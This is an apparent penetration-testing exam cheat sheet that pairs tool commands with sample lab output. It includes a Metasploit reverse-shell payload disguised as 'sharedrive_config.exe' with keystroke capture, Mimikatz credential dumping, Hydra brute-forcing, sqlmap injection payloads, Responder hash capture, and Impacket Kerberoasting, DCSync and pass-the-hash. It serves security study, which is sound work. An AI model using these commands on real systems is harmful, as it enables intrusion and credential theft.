High severity vulnerabilities found
4. TruffleHog
-
Use Case: Secrets scanning in Git, S3 buckets, chats, wikis, logs, API testing platforms, object stores and filesystems. Github
-
Input Example:
trufflehog git https://github.com/trufflesecurity/test_keys --results=verifiedtrufflehog filesystem super_secret_foldertrufflehog docker --image sagikazarmark/dvwa -
Output Example:
\U0001f437\U0001f511\U0001f437 TruffleHog. Unearth your secrets. \U0001f437\U0001f511\U0001f437 2025-11-08T15:45:23Z info-0 trufflehog running source {"source_manager_worker_id": "qEhpO", "with_units": true} 2025-11-08T15:45:23Z info-0 trufflehog scanning repo {"source_manager_worker_id": "qEhpO", "unit_kind": "dir", "unit": "/tmp/trufflehog-6505-708392298", "repo": "https://github.com/trufflesecurity/test_keys"} \u2705 Found verified result \U0001f437\U0001f511 Detector Type: AWS Decoder Type: PLAIN Raw result: AKIAQYLPMN5HHHFPZAM2 Arn: arn:aws:iam::052310077262:user/canarytokens.com@@c20nnjzlioibnaxvt392i9ope Resource_type: Access key Account: 052310077262 Message: This is an AWS canary token generated at canarytokens.org. Is_canary: true Commit: 0416560b1330d8ac42045813251d85c688717eaf Email: counter <[email protected]> File: new_key Line: 2 Repository: https://github.com/trufflesecurity/test_keys Repository_local_path: /tmp/trufflehog-6505-708392298 Timestamp: 2023-10-19 02:56:37 +0000 [...] \u2705 Found verified result \U0001f437\U0001f511 Detector Type: URI Decoder Type: PLAIN Raw result: https://admin:[email protected] Commit: 690829e7f11c59c6bc8c40024b2595f4e5c9286d Email: Andrea Luzzardi <[email protected]> File: leaky Line: 3 Repository: https://github.com/trufflesecurity/test_keys Repository_local_path: /tmp/trufflehog-6505-708392298 Timestamp: 2025-01-22 01:13:13 +0000 2025-11-08T15:45:25Z info-0 trufflehog finished scanning {"chunks": 14, "bytes": 6959, "verified_secrets": 4, "unverified_secrets": 0, "scan_duration": "1.939086284s", "trufflehog_version": "3.90.13", "verification_caching": {"Hits":0,"Misses":6,"HitsWasted":0,"AttemptsSaved":0,"VerificationTimeSpentMS":4198}}[...] \u2705 Found verified result \U0001f437\U0001f511 Detector Type: AWS Decoder Type: PLAIN Raw result: AKIAQYLPMN5HHHFPZAM2 Is_canary: true Arn: arn:aws:iam::052310077262:user/canarytokens.com@@c20nnjzlioibnaxvt392i9ope Resource_type: Access key Account: 052310077262 Message: This is an AWS canary token generated at canarytokens.org. File: super_secret_folder/secret.txt Line: 3 [...]Found unverified result \U0001f437\U0001f511\u2753 Detector Type: PrivateKey Decoder Type: PLAIN Raw result: -----BEGIN PRIVATE KEY----- MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDfDRwfKh8yOYpm uQkkhVYdXwSDpZaL0B1gqaGzvjJ2n9PjHxxw0CV2UbHmyaqBNPlRW+OtHYRL1np/ [...] qeMXZOZ87ZYIYvPP0JRqutfUb1SAAAPW8o7uU1I4uNvqIa6jU4PaFazqicFGVYcp pbAt7TBWU468BGkweQfWK0s= -----END PRIVATE KEY----- File: /etc/ssl/private/ssl-cert-snakeoil.key Image: sagikazarmark/dvwa Layer: sha256:e6c91bb380b46e53f1b44edc6bb8992f8a1f89c553050b186a5159e4c66778a5 Tag: latest
5. BloodHound
-
Use Case: AD attack path mapping.
-
Input Example: GUI-based after data collection
-
Output Example: Graph of privilege escalation paths
6. PowerSploit
-
Use Case: Post‑exploitation checks during vuln validation (be cautious & within scope).
-
Input Example: CheatSheet
Import-Module PowerSploit Invoke-MimikatzImport-Module .\PowerSploit\PowerSploit.psd1 Invoke-UserHunterImport-Module .\CodeExecution\Invoke-WmiCommand.ps1 Invoke-WmiCommand -Payload { ipconfig /all } -ComputerName $env:COMPUTERNAME | Select-Object -ExpandProperty PayloadOutput -
Output Example:
Successfully dumped credentials: Username: Administrator Password: P@ssw0rd!Found logged-on user: EXAMPLE\jdoe on HOST: WS-07Windows IP Configuration Host Name . . . . . . . . . . . . : WATCHMAN-DC Primary Dns Suffix . . . . . . . : WATCH.local Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : eu-west-1.ec2-utilities.amazonaws.com eu-west-1.compute.internal [...]
7. Grype
-
Use Case: Scan a Docker image or SBOM for vulnerabilities before deploying to production. Github
-
Input Example:
grype docker:sagikazarmark/dvwa:latest > grype.txtgrype dir:. -
Output Example:
✔ Loaded image sagikazarmark/dvwa:latest ✔ Parsed image sha256:e901498e651ae2806f3fda7406d97b7e9294eaada44d1d4970e9b28189b6d967 ✔ Cataloged contents 32a1c74f7535f93b6a02b2325a3b97780ffd825613ef49b691bd55fb454000e4 ├── ✔ Packages [219 packages] ├── ✔ Executables [1,117 executables] ├── ✔ File metadata [9,149 locations] ├── ✔ File digests [9,149 files] ✔ Scanned for vulnerabilities [1910 vulnerability matches] ├── by severity: 0 critical, 203 high, 1001 medium, 184 low, 522 negligible NAME INSTALLED FIXED IN TYPE VULNERABILITY SEVERITY EPSS RISK libapache2-mod-php5 5.6.30+dfsg-0+deb8u1 5.6.40+dfsg-0+deb8u7 deb CVE-2019-11043 High 94.1% (99th) 82.5 (kev) php5 5.6.30+dfsg-0+deb8u1 5.6.40+dfsg-0+deb8u7 deb CVE-2019-11043 High 94.1% (99th) 82.5 (kev) php5-cli 5.6.30+dfsg-0+deb8u1 5.6.40+dfsg-0+deb8u7 deb CVE-2019-11043 High 94.1% (99th) 82.5 (kev) php5-common 5.6.30+dfsg-0+deb8u1 5.6.40+dfsg-0+deb8u7 deb CVE-2019-11043 High 94.1% (99th) 82.5 (kev) php5-gd 5.6.30+dfsg-0+deb8u1 5.6.40+dfsg-0+deb8u7 deb CVE-2019-11043 High 94.1% (99th) 82.5 (kev) php5-mysql 5.6.30+dfsg-0+deb8u1 5.6.40+dfsg-0+deb8u7 deb CVE-2019-11043 High 94.1% (99th) 82.5 (kev) php5-readline 5.6.30+dfsg-0+deb8u1 5.6.40+dfsg-0+deb8u7 deb CVE-2019-11043 High 94.1% (99th) 82.5 (kev) libapache2-mod-php5 5.6.30+dfsg-0+deb8u1 5.6.39+dfsg-0+deb8u1 deb CVE-2018-19518 High 94.0% (99th) 70.5 [...]✔ Indexed file system . ✔ Cataloged contents cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 ├── ✔ Packages [13,819 packages] ├──✔ Executables [1,569 executables] ├── ✔ File metadata [2,791 locations] ├── ✔ File digests [2,791 files] ✔ Scanned for vulnerabilities [1092 vulnerability matches] ├── by severity: 76 critical, 409 high, 520 medium, 87 low, 0 negligible ├── by status: 1054 fixed, 38 not-fixed, 0 ignored [0000] WARN no explicit name and version provided for directory source, deriving artifact ID fro [0280] WARN Unable to determine the OS distribution of some packages. This may result in missing vulnerabilities. You may specify a distro using: --dist NAME INSTALLED FIXED IN TYPE VULNERABILITY SEVERITY EPSS RISK spring-beans 4.3.7.RELEASE 5.2.20.RELEASE java-archive GHSA-36p3-wjmg-h94x Critical 94.4% (99th) 98.7 (kev) xstream 1.4.9 1.4.11 java-archive GHSA-hf23-9pf7-388p Critical 91.9% (99th) 86.4 pillow 9.5.0 10.0.1 python GHSA-j7hp-h8jx-5ppr High 94.1% (99th) 85.6 (kev) xstream 1.4.9 1.4.18 java-archive GHSA-j9h8-phrw-h4fh High 94.4% (99th) 84.0 (kev) stdlib go1.17.5 *1.20.10, 1.21.3 go-module CVE-2023-44487 High 94.4% (99th) 78.8 (kev) jackson-databind 2.8.3 2.8.11 java-archive GHSA-rfx6-vp9g-rh7v Critical 79.8% (99th) 75.0 [...]
8. Trivy
-
Use Case: Perform a full security audit of an image or repo, including CVEs and hardcoded secrets. Github
-
Input Example:
trivy image sagikazarmark/dvwatrivy fs . --scanners vuln > vulns.txt -
Output Example:
sagikazarmark/dvwa (debian 8.7) =============================== Total: 1327 (UNKNOWN: 41, LOW: 100, MEDIUM: 572, HIGH: 432, CRITICAL: 182) [...] | Library | Vulnerability | Severity | Status | Installed Version | Fixed Version | Title | |----------|-------------------|-----------|--------|-------------------------|---------------------------|-----------------------------------------------------------------------| | apache2 | CVE-2017-3167 | CRITICAL | fixed | 2.4.10-10+deb8u8 | 2.4.10-10+deb8u9 | httpd: ap_get_basic_auth_pw() authentication bypass | [...]Desktop/Tools/C2/Covenant/Covenant/bin/Debug/netcoreapp3.1/Covenant.deps.json (dotnet-core) =========================================================================================== Total: 6 (UNKNOWN: 0, LOW: 0, MEDIUM: 5, HIGH: 1, CRITICAL: 0) | Library | Vulnerability | Severity | Status | Installed Version | Fixed Version | Title | |-----------------------------------------------|--------------------|----------|--------|-------------------|----------------------------|-----------------------------------------------------| | Microsoft.AspNetCore.Authentication.JwtBearer | CVE-2021-34532 | MEDIUM | fixed | 3.1.3 | 2.1.29, 3.1.18, 5.0.9 | dotnet: ASP.NET Core JWT token logging | | | | | | | | [https://avd.aquasec.com/nvd/cve-2021-34532 | [...]
9. Kube-hunter
-
Use Case: Probe Kubernetes clusters for common exposures (anonymous kubelet, dashboard, etc.). Github
-
NB: No longer maintained, recommendation is to use Trivy
-
Input Example:
kube-hunter Choose one of the options below: 1. Remote scanning (scans one or more specific IPs or DNS names) 2. Interface scanning (scans subnets on all local network interfaces) 3. IP range scanning (scans a given IP range) Your choice:kube-hunter --remote 10.80.128.251kube-hunter --pod -
Output Example:
Your choice: 3 CIDR separated by a ',' (example - 192.168.0.0/16,!192.168.0.8/32,!192.168.1.0/24): 10.80.128.251 2025-11-20 15:43:43,380 INFO kube_hunter.modules.report.collector Started hunting 2025-11-20 15:43:43,380 INFO kube_hunter.modules.report.collector Discovering Open Kubernetes Services 2025-11-20 15:43:43,468 INFO kube_hunter.modules.report.collector Found open service "Unrecognized K8s API" at 10.80.128.251:6443 Nodes +-------------+---------------+ | TYPE | LOCATION | +-------------+---------------+ | Node/Master | 10.80.128.251 | +-------------+---------------+ Detected Services +----------------------+--------------------+----------------------+ | SERVICE | LOCATION | DESCRIPTION | +----------------------+--------------------+----------------------+ | Unrecognized K8s API | 10.80.128.251:6443 | A Kubernetes API | | | | service | +----------------------+--------------------+----------------------+ No vulnerabilities were found
🧪 Tips (Exam‑useful)
- Always confirm CVEs against NVD for accuracy.
- Authenticated scans give deeper results than unauthenticated.
- False positives common in Nikto—manual verification needed.
✅ Domain 4.0 Tools and Examples
1. Metasploit
-
Use Case: Exploit execution. Rapid7
-
Also see Msfvenom
-
Input Example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.2.20.215 LPORT=4444 -f exe > sharedrive_config.exe msfconsole -q -x "use exploit/multi/handler; set PAYLOAD=windows/meterpreter/reverse_tcp; set LHOST=10.2.20.215; set LPORT=4444; exploit" -
Output Example:
meterpreter # Once reverse shell is established: meterpreter > keyscan_start Starting the keystroke sniffer... [...] meterpreter > keyscan_dump Dumping captured keystrokes... password1334<CR> meterpreter >
2. Hydra
-
Use Case: Brute-force login. Github
-
Input Example:
hydra -l [email protected] -P passwords.txt smtps://10.10.144.205hydra -L usernames-list.txt -P seasons-exp.txt ssh://10.10.81.19hydra -l phillips -P wordlist.txt -V 10.10.144.205 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php"# brute-force BASIC AUTH page (/protected) hydra -l bob -P /usr/share/wordlists/rockyou.txt 10.10.131.92 http-get /protected -
Output Example:
[DATA] attacking smtps://10.10.144.205:465/ [465][smtp] host: 10.10.144.205 login: [email protected] password: !multidisciplinary00 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-08 10:36:48[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 200 login tries (l:5/p:40), ~13 tries per task [DATA] attacking ssh://10.10.81.19:22/ [22][ssh] host: 10.10.81.19 login: burgess password: Fall2021@ 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-08 11:50:35[...] [ATTEMPT] target 10.10.144.205 - login "phillips" - pass "clinical" - 29 of 106 [child 13] (0/0) [ATTEMPT] target 10.10.144.205 - login "phillips" - pass "innovative" - 30 of 106 [child 15] (0/0) [80][http-get-form] host: 10.10.144.205 login: phillips password: Paracetamol 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-08 11:10:58[...] [DATA] attacking http-get://10.10.131.92:80/protected [80][http-get] host: 10.10.131.92 login: bob password: bubbles 1 of 1 target successfully completed, 1 valid password found
3. sqlmap
-
Use Case: SQL injection exploitation. Github
-
Input Example:
sqlmap -r api-req.txt --dbssqlmap -r api-req.txt -D vn_admin --tables# Payload from https://tryhackme.com/room/vulnnetendgame. Save the request to determin if blog is injectable GET /vn_internals/api/v2/fetch/?blog=1 HTTP/1.1 Host: api.vulnnet.thm User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i -
Output Example:
[15:10:53] [INFO] heuristic (basic) test shows that GET parameter 'blog' might be injectable [15:10:53] [INFO] testing for SQL injection on GET parameter 'blog' [15:10:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [15:10:53] [INFO] GET parameter 'blog' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable [...] sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests: --- Parameter: blog (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: blog=1 AND 3391=3391 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: blog=1 AND (SELECT 7819 FROM (SELECT(SLEEP(5)))swed) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: blog=-7358 UNION ALL SELECT CONCAT(0x717a706271,0x6a6849505479467174526363464658775347754d4f79626752444172587875746e4e464e766b766a,0x717a786271),NULL,NULL-- - --- [15:11:29] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [15:11:29] [INFO] fetching database names [15:11:29] [INFO] retrieved: 'information_schema' [15:11:29] [INFO] retrieved: 'blog' [15:11:29] [INFO] retrieved: 'vn_admin' available databases [3]: [*] blog [*] information_schema [*] vn_admin [...][...] Database: vn_admin [48 tables] +---------------------------------------------+ | backend_layout | | be_dashboards | | be_groups | | be_sessions | | be_users | [...]
4. Burp Suite
-
Use Case: Web app testing & interception.
-
Input Example: Proxy intercept enabled
-
Output Example: Captured HTTP requests for manipulation
5. John the Ripper
-
Use Case: Password cracking that supports custom rules. Github
-
Input Example:
/etc/john/john.conf [...] [List.Rules:StrikeSec] Az"[0-9]" ^[!@#$] [...]john --wordlist=/tmp/just-the-word-password.txt --rules=StrikeSec --stdoutjohn --wordlist=/usr/share/wordlists/rockyou.txt hash.txt -
Output Example:
Using default input encoding: UTF-8 !password0 @password0 #password0 $password0 !password1 [...]Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt" Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead [...] Using default input encoding: UTF-8 Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x]) Warning: no OpenMP support for this hash type, consider --fork=2 Press 'q' or Ctrl-C to abort, almost any other key for status sunshine (?) 1g 0:00:00:00 DONE (2025-11-07 17:18) 8.333g/s 266.6p/s 266.6c/s 266.6C/s tigger..butterfly Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably Session completed.
6. Responder
-
Use Case: LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. Github
-
Input Example:
sudo responder -I breachad -
Output Example:
[+] Listening for events... [!] Error starting TCP server on port 80, check permissions or other servers running. [!] Error starting TCP server on port 3389, check permissions or other servers running. [!] Error starting TCP server on port 389, check permissions or other servers running. [SMB] NTLMv2-SSP Client : ::ffff:10.200.4.202 [SMB] NTLMv2-SSP Username : ZA\svcFileCopy [SMB] NTLMv2-SSP Hash : svcFileCopy::ZA:5969405a34cd1152:06B1CCCCA164CFB0D4A2C731DDDA591C:0101000000000000806E1874BE15DC0139AD96F1C8B71A690000000002000800390039005600570001001E00570049004E002D003900580041005400590047005600510034004200310004003400570049004E002D00390058004100540059004700560051003400420031002E0039003900560057002E004C004F00430041004C000300140039003900560057002E004C004F00430041004C000500140039003900560057002E004C004F00430041004C0007000800806E1874BE15DC0106000400020000000800300030000000000000000000000000200000C525F3EC55CB122FCB61358EFD4AAD876B72883968F82B73FA59FA029A3C76A30A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E00350030002E0032002E0039000000000000000000- Can crack this 5600 hash (NetNTLMv2) via Hashcat
7. Netcat (nc)
-
Use Case: Banner grabbing, reverse/bind shells, simple TCP/UDP clients. User Guide
-
Input Example:
# Banner grab nc -vn 10.10.1.171 80# Set up a listener and keep the connection alive # '-k' is server-side only nc -k -lvnp 4444# Connect to listener # Cat the file to send, then the second cat waits for keyboard input # This way the connection doesn't close straight after the file is sent (cat file_to_send_txt; cat) | nc -v 127.0.0.1 4444# Set up a listener, and pipe received output to a file # This will contain the text that file_to_send.txt contains nc -lvnp 4444 > received_output.txtoptions: -c shell commands as `-e'; use /bin/sh to exec [dangerous!!] -e filename program to exec after connect [dangerous!!] -b allow broadcasts -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs delay interval for lines sent, ports scanned -k set keepalive option on socket -l listen mode, for inbound connects -n numeric-only IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize local and remote ports -q secs quit after EOF on stdin and delay of secs -s addr local source address -T tos set Type Of Service -t answer TELNET negotiation -u UDP mode -v verbose [use twice to be more verbose] -w secs timeout for connects and final net reads -C Send CRLF as line-ending -z zero-I/O mode [used for scanning] -
Output Example:
(UNKNOWN) [10.10.1.171] 80 (http) open GET / HTTP/1.1 HTTP/1.1 400 Bad Request Server: nginx/1.22.1 Date: Fri, 07 Nov 2025 14:48:31 GMT Content-Type: text/html Content-Length: 157 Connection: close <html> <head><title>400 Bad Request</title></head> <body> <center><h1>400 Bad Request</h1></center> <hr><center>nginx/1.22.1</center> </body> </html>
8. Impacket
-
Use Case: AD protocols abuse (SMB, MSRPC, LDAP, Kerberos) and lateral movement. Github
-
Input Example:
# AS-REP Roasting a list of users # We can also specify -format john/hashcat to export the AS-REP hash in john or hashcat formats respectively. GetNPUsers.py -dc-ip 10.10.186.246 thm.red/ -usersfile /tmp/users.lst# Check for kerberoastable accounts # LDAP tools like `GetUserSPNs.py` can use Kerberos (`-k` flag), which is often more reliable in environments where: - NTLM is restricted - LDAP signing is enforced - DNS resolution is flaky GetUserSPNs.py controller.local/[email protected] -hashes :2777b7fec870e04dda00cd7260f7bee6 -no-pass -k -dc-ip 10.10.106.82# Kerberoasting - requesting TGS tickets GetUserSPNs.py controller.local/[email protected] -hashes :2777b7fec870e04dda00cd7260f7bee6 -no-pass -k -dc-ip 10.10.106.82 -request# Dumping the KRBTGT hash secretsdump.py 'controller.local/Administrator:P@$$W0rd'@10.10.175.51# Extracting SAM NTLM hashes from sam and system registry hives & shadow volume secretsdump.py -sam sam -system system- LOCAL# Extracting NTDS secretsdump.py -security ./registry/SECURITY -system ./registry/SYSTEM -ntds ./'Active Directory'/ntds.dit local# Perform DC-Sync remotely secretsdump.py -just-dc-ntlm THM.red/[email protected]# Executing files over SMB from linux smbexec.py 'thm:Passw0rd!'@10.10.5.212# Relay NTLM authentication capture to -T target ntlmrelayx.py -smb2support -t smb://10.200.72.201 -debug# Pass-the-hash psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 [email protected]# Serving files # Here the share name is “public”, located at “/root/share” smbserver.py -smb2support public /root/share -username THMBackup -password CopyMaster555 -
Output Example:
# AS-REP Roasting a list of users - GetNPUsers.py [...] [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User thm doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] User sshd doesn't have UF_DONT_REQUIRE_PREAUTH set [email protected]:677c3d66decbbef495bcb0529e1eae4b$1c5ed1ad7192d9641454cf2deedc0cb2f6e97db7df0b209413e2be8b00aea9c4126d804ce63085e3bf9dc46ceb24da44dd4806219d256bb53b6838bd8e8fa0e7d0f360d6cb497ba5d42233cbef2c84a64394600b7445a5fb326879eda561c7d57fe99e360db60d516b99fecf68510bc87907eff684ff3e2ee926c58c1b93b99852c6b364578e41c5bcd7d606753e4bb8210961d1c4cbd756a10d2551ebfe1ed28049e0a9fe3d77d6ff1412ce400340a39f1551045558f9f0c12329cc06a84177a50192a6f9fd8b19a90f704b5fdeabaa56e0dd60068a7fd3d8e7726e9f702efc6234 [-] User CREDS-HARVESTIN$ doesn't have UF_DONT_REQUIRE_PREAUTH set root@ip-10-10-150-52:/tmp## Check for kerberoastable accounts - GetUserSPNs.py Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra [*] Getting machine hostname [-] CCache file is not found. Skipping... ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ----------------------------------------------- ----------- --------------------------------------------------------------- -------------------------- -------------------------- ---------- CONTROLLER-1/SQLService.CONTROLLER.local:30111 SQLService CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local 2020-05-25 23:28:26.922527 2020-05-25 23:46:42.467441 CONTROLLER-1/HTTPService.CONTROLLER.local:30222 HTTPService 2020-05-25 23:39:17.578393 2020-05-25 23:40:14.671872 root@ip-10-10-177-75:/opt/impacket/examples## Kerberoasting - requesting TGS tickets - GetUserSPNs.py [...] [*] Getting machine hostname [-] CCache file is not found. Skipping... ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ----------------------------------------------- ----------- --------------------------------------------------------------- -------------------------- -------------------------- ---------- CONTROLLER-1/SQLService.CONTROLLER.local:30111 SQLService CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local 2020-05-25 23:28:26.922527 2020-05-25 23:46:42.467441 CONTROLLER-1/HTTPService.CONTROLLER.local:30222 HTTPService 2020-05-25 23:39:17.578393 2020-05-25 23:40:14.671872 [-] CCache file is not found. Skipping... $krb5tgs$23$*SQLService$CONTROLLER.LOCAL$controller.local/SQLService*$6dec76a5974ec758041cd185ad73611b$60acf37bf501464a51d551c8ddb67f44595a1fdce91f088757db6fb22455e2587c766a680b556333638c9bff2e5da5f498c44a467169ade4f5b67d0929d8ae2247c2adc82fb188522e77673664672efe49f59f6a4ca5b667d6aa9c552e79a8ddbab3aa5819e5aafd25877c8e455739a94e036725029493a387fe7957c034c44602931f5ff54d3f6429e257544283b11b660b2682058d28d43823656b0ac73fe191a693ab5a4b8c2e57ea7db19799bb908e094123704cbcebfd4cff275ccc8218c99717491be2b280f806a82cfc94d25efbe8d002f4f233b4b103f164920b73dddf4b478046a4a0a9e14406f2c347a0baf48cfbb231586f6d76b4c25ed729345819fc1536284bbf1227a68589509c80880c852aad0c23ec612f946efd0a6e36cdbd8d0ae5ccd345268a9c79c676f5b6d2b0adea46d6bc2f85459d89adb867d5930ff9e9c7c9261303f9091d52d662ebb29e933c6e08e2d7cf4ebfe0bd77dfa39ac96f146f9c62287c8eb62315fc6e1e8b85d789d220100bd8033bf5a521e9370b9eab10a612fbe762f3ec96b5a3e8ce0fb3d4fe29d4c03afa6d1982ef28e14aaab28e0f24912b905650cf2b717dc25e4330a2371397a12855a260230c3a15acc202a8bd2c8030097a70031ad94e2eed4583ac815a5cd2f21cc001b94035bb2c794a390d30501a6d30dd0274ada1f3872c5d149f162a1eb6810707cafe0fa5b0e10b475f7095d8e1ee3007f12ab7f2306313e3c36d969a45550087434664ed72ed285717333c457ef4e3f73862a22e02227de209f5305ff21e30b43444b19247ac6f56374e9da4fba7f8b02711a33c0dfd1895afbbdd8c75008ae6545fd4e210e746bcbb67dc4a2e94344d57949796f250cb5b6a415d0afc060db87bb2c6b607c45ae225726697857783446c01c28a2688e2a6ff94903e7c0cf6d6019e818ace825523c6f8044ba31e8d923d3cf632dea5b1880265bd9a3fab6b7d29e21b9a0a46d13bb108fa92dae9deb411cc7aad0b0ae94ff2206a8296d764f257735f83b997b85ecb0c83685d48b142477c2ddd8c2638e249326fb4e293cab92c65b00b910b3846a6bb8ea02115f22a83e75fd2cb098e9fb3330b88c5e6a7abab1eb940f75e40aa8b937a9355311e734222c5c9d87178a7f16de2515a7ea3400d16bb8f869c2210d787bfa9fc2bcbdf4e63ab5c11cf711dff1c326413c714daff65e6952392798ac1ef57b7020607eaf953589685092dfe44ed006e106b13f8eb4de03bfbb9d5b93f7a516783ce38e72f04c6b4687788866fba144eadbb5f8c43e9f2aee9eafdf9489060cfbb5eec61d16fb05b436056d1dfe0773c382780d610dd372b5aa449c2df60672b02835335e063f6711a46ffe259405f69c12eaac3748f90c3a532b3d804e6f7380c2d6eb09e719f18bc282cba982ecdc76482f8986f2bae0536b291cc9cbfe0cf16e359fafde7b8b37009c3369a17b2d0f5c617399b0e0dd1edbc246f934fb91f $krb5tgs$23$*HTTPService$CONTROLLER.LOCAL$controller.local/HTTPService*$fbb22e10128330da53612b0abeef44b1$b6257326c6d60a87c03b7435a8356fd18532eaf25d777cc41aef67cc5f8bd2205f6159c6719d465437c33ffaf76cee44e6b792bfe71987640e1774c1652cd538cdd123348aa5ab43b3e7283d252b2d9bd49b09f71bcb040f6c9c63d95c5859844f224cc1d5af984518b7ca7a552644e8172991009e8efa4181ef25602ec6d848b5cd80418afbb9cd2c26b03534cc0a69b41e72ed747c872b8d44cc2e98e2f2cfbc470554b20a63c1af6aa0f811f64e9e916fd6ad73a0ab9305b5fb3100fc3ef32457b5d1e4cbc35cdec8de9ecfea25967f5d335e9fc35906877380241e3aed2a4f5218ee9c75b794a517b2fd812ef1237a1dbb18a87d84517fe8840c02d8bdec293d14b38c0a19bce0d15bea4873c40715e622dc3c65cc81936d5f92ec4f81a8e446bec4fcdcca10de6763e588429c3c3785d5adf0bbe2165ba6e99d5259b87c232bd9441ede28c04a0b7db565454dc91927da9cb72a39f5b1f4a8fccfdfd38cadf8d9d94d994a6b228a167a0c0e555bbf89b5c0a135696654ad7b98523dad17fae7ac76efe75b2485f6783c138afffc9d6af60c2e790d7ca75834599f09a8c46a054cce14897b39e8bb1055703cc77f243014b3d4aada93996659e3455a76e918cb3492f19f017c87177e4633db92cc30048c093a5230934cba7ec4b58ee3c6db7bf6be96110f6240066b331ff4ea24b6c3f63ac9775ae527fa9cf5334e0d27834e829a2bc23db8de75730f4d1464b0dcb8c1c59c74f5a8e8f79636348af852bc15c017d911b6f1922ce62cadc72bc737ac6d59c5ad6bfd95dd44f89ec9ecac78bd7bd5f6eda386161682504827b9901ca33a21ca1b466a1b23ac375041b95d7de2f610c363d24c41de62326639e162803f81c1669e5a6f26a59e73771a3f4877f056dd717abfcfe4feebd5d6fca2595fc8fc9d0dc8ff8d60115cdb8a0fc9e9bb5cc5b02687b8d911544eaf749b85e3447535c7d022963b8d8c889dcb7086e099311b220111aa24a187748ad353cb3946856c9fed553e733af55e004efbdaf467dbe745605960507651e863c7a7d17d194ccebddf220f6c6b6577734aba1383fe7d0adccce306cb4d828358e774be029104cf73fa93a2bb4fc5a93f85a6aca9e3e8edbd2ccdfb48dc81dcf7c1cb86f59479d5863f668c8c0fb7985da533d20fa2a2958786d2542e78df82167e7f9893946a0fe53504d11ca4217cd7f47ec8932b1dadd7a203fdad877222594b6890a0e371fd3bb930a2ecd0e301e869c86b39d3263ba616c4515b4869258cb85ea12755ab9b2d20fc8b3bd5ff290b7f32117fc659572845f4279cfdccfcf729929f056430acf29f2e5b8e2e83a58eead52f31f0130f0436349f037ed57064d180fb25dea2ffea01d7fd42f6ee9d9d882df04f5dbe8d7adaef67982344be09bc92b39fddf0eca4529270dfcb58c536db6f1ac36f8bb9d06b3213da8421192b9987135570649e6b490d22e1352549bf2a634d5778af12b97fc2 root@ip-10-10-177-75:/opt/impacket/examples## Dumping the KRBTGT hash - secretsdump.py [*] Target system bootKey: 0x3793e46f2ffcf19c9060c058e1a8c4d7 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:2777b7fec870e04dda00cd7260f7bee6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC CONTROLLER\CONTROLLER-1$:aes256-cts-hmac-sha1-96:b154757ed42fd39d373bb03f7d49ba42c7f90c6d2d6c72044b835f34df9fde6e CONTROLLER\CONTROLLER-1$:aes128-cts-hmac-sha1-96:0a2f696a1b5855a97de0ab300307bc2d CONTROLLER\CONTROLLER-1$:des-cbc-md5:fe0b101c7a1357f2 CONTROLLER\CONTROLLER- 